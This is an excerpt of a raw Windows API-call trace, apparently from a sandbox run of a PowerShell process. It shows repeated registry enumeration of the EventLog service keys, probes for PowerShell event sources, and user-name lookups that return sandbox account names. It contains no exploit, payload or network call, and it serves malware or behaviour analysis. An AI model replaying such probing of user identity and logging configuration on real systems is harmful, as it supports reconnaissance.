	[0102.987] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x6, lpName=0x22b7e0, lpcchName=0xed478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xed478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0102.987] CoTaskMemFree (pv=0x22b7e0) 
	[0102.987] CoTaskMemFree (pv=0x0) 
	[0102.987] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0102.987] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x7, lpName=0x22b7e0, lpcchName=0xed478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xed478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0102.987] CoTaskMemFree (pv=0x22b7e0) 
	[0102.987] CoTaskMemFree (pv=0x0) 
	[0102.987] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0102.987] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x8, lpName=0x22b7e0, lpcchName=0xed478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xed478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0102.987] CoTaskMemFree (pv=0x22b7e0) 
	[0102.987] CoTaskMemFree (pv=0x0) 
	[0102.987] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x308) returned 0x0
	[0102.987] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x0) returned 0x2
	[0102.987] RegOpenKeyExW (in: hKey=0x304, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x30c) returned 0x0
	[0102.988] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x0) returned 0x2
	[0102.988] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x320) returned 0x0
	[0102.988] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x0) returned 0x2
	[0102.988] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x338) returned 0x0
	[0102.988] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x0) returned 0x2
	[0102.988] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x33c) returned 0x0
	[0102.988] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x0) returned 0x2
	[0102.988] RegOpenKeyExW (in: hKey=0x304, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x340) returned 0x0
	[0102.988] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x0) returned 0x2
	[0102.988] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x344) returned 0x0
	[0102.989] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x0) returned 0x2
	[0102.989] RegOpenKeyExW (in: hKey=0x304, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x348) returned 0x0
	[0102.989] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x0) returned 0x2
	[0102.989] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x34c) returned 0x0
	[0102.989] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed4d8 | out: phkResult=0xed4d8*=0x350) returned 0x0
	[0102.989] RegCloseKey (hKey=0x350) returned 0x0
	[0102.989] RegCloseKey (hKey=0x304) returned 0x0
	[0102.990] RegCloseKey (hKey=0x34c) returned 0x0
	[0103.005] CoTaskMemAlloc (cb=0x804) returned 0x204710
	[0103.006] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x204710, nSize=0xed6e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed6e8) returned 0x1
	[0103.007] CoTaskMemFree (pv=0x204710) 
	[0103.008] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.008] GetUserNameW (in: lpBuffer=0x22b7e0, pcbBuffer=0xed728 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed728) returned 1
	[0103.008] CoTaskMemFree (pv=0x22b7e0) 
	[0103.280] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xed428 | out: phkResult=0xed428*=0x354) returned 0x0
	[0103.280] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed39c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed398, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed39c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed398*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.280] CoTaskMemFree (pv=0x0) 
	[0103.280] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.280] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0x22b7e0, lpcchName=0xed428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xed428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.280] CoTaskMemFree (pv=0x22b7e0) 
	[0103.280] CoTaskMemFree (pv=0x0) 
	[0103.280] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.280] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0x22b7e0, lpcchName=0xed428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xed428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.280] CoTaskMemFree (pv=0x22b7e0) 
	[0103.280] CoTaskMemFree (pv=0x0) 
	[0103.280] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.280] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0x22b7e0, lpcchName=0xed428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xed428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.280] CoTaskMemFree (pv=0x22b7e0) 
	[0103.280] CoTaskMemFree (pv=0x0) 
	[0103.280] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.280] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0x22b7e0, lpcchName=0xed428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xed428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.280] CoTaskMemFree (pv=0x22b7e0) 
	[0103.280] CoTaskMemFree (pv=0x0) 
	[0103.281] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.281] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0x22b7e0, lpcchName=0xed428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xed428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.281] CoTaskMemFree (pv=0x22b7e0) 
	[0103.281] CoTaskMemFree (pv=0x0) 
	[0103.281] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.281] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0x22b7e0, lpcchName=0xed428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xed428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.281] CoTaskMemFree (pv=0x22b7e0) 
	[0103.281] CoTaskMemFree (pv=0x0) 
	[0103.281] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.281] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0x22b7e0, lpcchName=0xed428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xed428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.281] CoTaskMemFree (pv=0x22b7e0) 
	[0103.281] CoTaskMemFree (pv=0x0) 
	[0103.281] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.281] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0x22b7e0, lpcchName=0xed428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xed428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.281] CoTaskMemFree (pv=0x22b7e0) 
	[0103.281] CoTaskMemFree (pv=0x0) 
	[0103.281] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.281] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x8, lpName=0x22b7e0, lpcchName=0xed428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xed428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.281] CoTaskMemFree (pv=0x22b7e0) 
	[0103.281] CoTaskMemFree (pv=0x0) 
	[0103.281] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x358) returned 0x0
	[0103.281] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x0) returned 0x2
	[0103.282] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x35c) returned 0x0
	[0103.282] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x0) returned 0x2
	[0103.282] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x360) returned 0x0
	[0103.282] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x0) returned 0x2
	[0103.282] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x364) returned 0x0
	[0103.282] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x0) returned 0x2
	[0103.282] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x368) returned 0x0
	[0103.282] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x0) returned 0x2
	[0103.282] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x36c) returned 0x0
	[0103.282] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x0) returned 0x2
	[0103.283] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x370) returned 0x0
	[0103.283] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x0) returned 0x2
	[0103.283] RegOpenKeyExW (in: hKey=0x354, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x374) returned 0x0
	[0103.283] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x0) returned 0x2
	[0103.283] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x378) returned 0x0
	[0103.283] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x37c) returned 0x0
	[0103.283] RegCloseKey (hKey=0x37c) returned 0x0
	[0103.283] RegCloseKey (hKey=0x354) returned 0x0
	[0103.284] RegCloseKey (hKey=0x378) returned 0x0
	[0103.285] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xed428 | out: phkResult=0xed428*=0x378) returned 0x0
	[0103.285] RegQueryInfoKeyW (in: hKey=0x378, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed39c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed398, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed39c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed398*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.285] CoTaskMemFree (pv=0x0) 
	[0103.285] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.285] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x0, lpName=0x22b7e0, lpcchName=0xed428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xed428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.285] CoTaskMemFree (pv=0x22b7e0) 
	[0103.285] CoTaskMemFree (pv=0x0) 
	[0103.285] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.285] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x1, lpName=0x22b7e0, lpcchName=0xed428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xed428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.285] CoTaskMemFree (pv=0x22b7e0) 
	[0103.285] CoTaskMemFree (pv=0x0) 
	[0103.285] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.285] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x2, lpName=0x22b7e0, lpcchName=0xed428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xed428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.285] CoTaskMemFree (pv=0x22b7e0) 
	[0103.285] CoTaskMemFree (pv=0x0) 
	[0103.285] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.285] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x3, lpName=0x22b7e0, lpcchName=0xed428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xed428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.285] CoTaskMemFree (pv=0x22b7e0) 
	[0103.286] CoTaskMemFree (pv=0x0) 
	[0103.286] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.286] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x4, lpName=0x22b7e0, lpcchName=0xed428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xed428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.286] CoTaskMemFree (pv=0x22b7e0) 
	[0103.286] CoTaskMemFree (pv=0x0) 
	[0103.286] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.286] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x5, lpName=0x22b7e0, lpcchName=0xed428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xed428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.286] CoTaskMemFree (pv=0x22b7e0) 
	[0103.286] CoTaskMemFree (pv=0x0) 
	[0103.286] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.286] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x6, lpName=0x22b7e0, lpcchName=0xed428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xed428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.286] CoTaskMemFree (pv=0x22b7e0) 
	[0103.286] CoTaskMemFree (pv=0x0) 
	[0103.286] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.286] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x7, lpName=0x22b7e0, lpcchName=0xed428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xed428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.286] CoTaskMemFree (pv=0x22b7e0) 
	[0103.286] CoTaskMemFree (pv=0x0) 
	[0103.286] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.286] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x8, lpName=0x22b7e0, lpcchName=0xed428, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xed428, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.286] CoTaskMemFree (pv=0x22b7e0) 
	[0103.286] CoTaskMemFree (pv=0x0) 
	[0103.286] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x354) returned 0x0
	[0103.286] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x0) returned 0x2
	[0103.287] RegOpenKeyExW (in: hKey=0x378, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x37c) returned 0x0
	[0103.287] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x0) returned 0x2
	[0103.287] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x380) returned 0x0
	[0103.287] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x0) returned 0x2
	[0103.287] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x384) returned 0x0
	[0103.287] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x0) returned 0x2
	[0103.287] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x388) returned 0x0
	[0103.287] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x0) returned 0x2
	[0103.287] RegOpenKeyExW (in: hKey=0x378, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x38c) returned 0x0
	[0103.288] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x0) returned 0x2
	[0103.288] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x390) returned 0x0
	[0103.288] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x0) returned 0x2
	[0103.288] RegOpenKeyExW (in: hKey=0x378, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x394) returned 0x0
	[0103.288] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x0) returned 0x2
	[0103.288] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x398) returned 0x0
	[0103.288] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed488 | out: phkResult=0xed488*=0x39c) returned 0x0
	[0103.288] RegCloseKey (hKey=0x39c) returned 0x0
	[0103.288] RegCloseKey (hKey=0x378) returned 0x0
	[0103.289] RegCloseKey (hKey=0x398) returned 0x0
	[0103.290] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xed3f8 | out: phkResult=0xed3f8*=0x398) returned 0x0
	[0103.290] RegQueryInfoKeyW (in: hKey=0x398, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed36c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed368, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed36c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed368*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.290] CoTaskMemFree (pv=0x0) 
	[0103.290] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.290] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x0, lpName=0x22b7e0, lpcchName=0xed3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xed3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.290] CoTaskMemFree (pv=0x22b7e0) 
	[0103.290] CoTaskMemFree (pv=0x0) 
	[0103.290] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.290] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x1, lpName=0x22b7e0, lpcchName=0xed3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xed3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.290] CoTaskMemFree (pv=0x22b7e0) 
	[0103.290] CoTaskMemFree (pv=0x0) 
	[0103.290] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.290] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x2, lpName=0x22b7e0, lpcchName=0xed3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xed3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.290] CoTaskMemFree (pv=0x22b7e0) 
	[0103.290] CoTaskMemFree (pv=0x0) 
	[0103.290] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.290] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x3, lpName=0x22b7e0, lpcchName=0xed3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xed3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.291] CoTaskMemFree (pv=0x22b7e0) 
	[0103.291] CoTaskMemFree (pv=0x0) 
	[0103.291] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.291] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x4, lpName=0x22b7e0, lpcchName=0xed3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xed3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.291] CoTaskMemFree (pv=0x22b7e0) 
	[0103.291] CoTaskMemFree (pv=0x0) 
	[0103.291] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.291] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x5, lpName=0x22b7e0, lpcchName=0xed3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xed3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.291] CoTaskMemFree (pv=0x22b7e0) 
	[0103.291] CoTaskMemFree (pv=0x0) 
	[0103.291] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.291] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x6, lpName=0x22b7e0, lpcchName=0xed3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xed3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0103.291] CoTaskMemFree (pv=0x22b7e0) 
	[0103.291] CoTaskMemFree (pv=0x0) 
	[0103.291] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.291] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x7, lpName=0x22b7e0, lpcchName=0xed3f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xed3f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
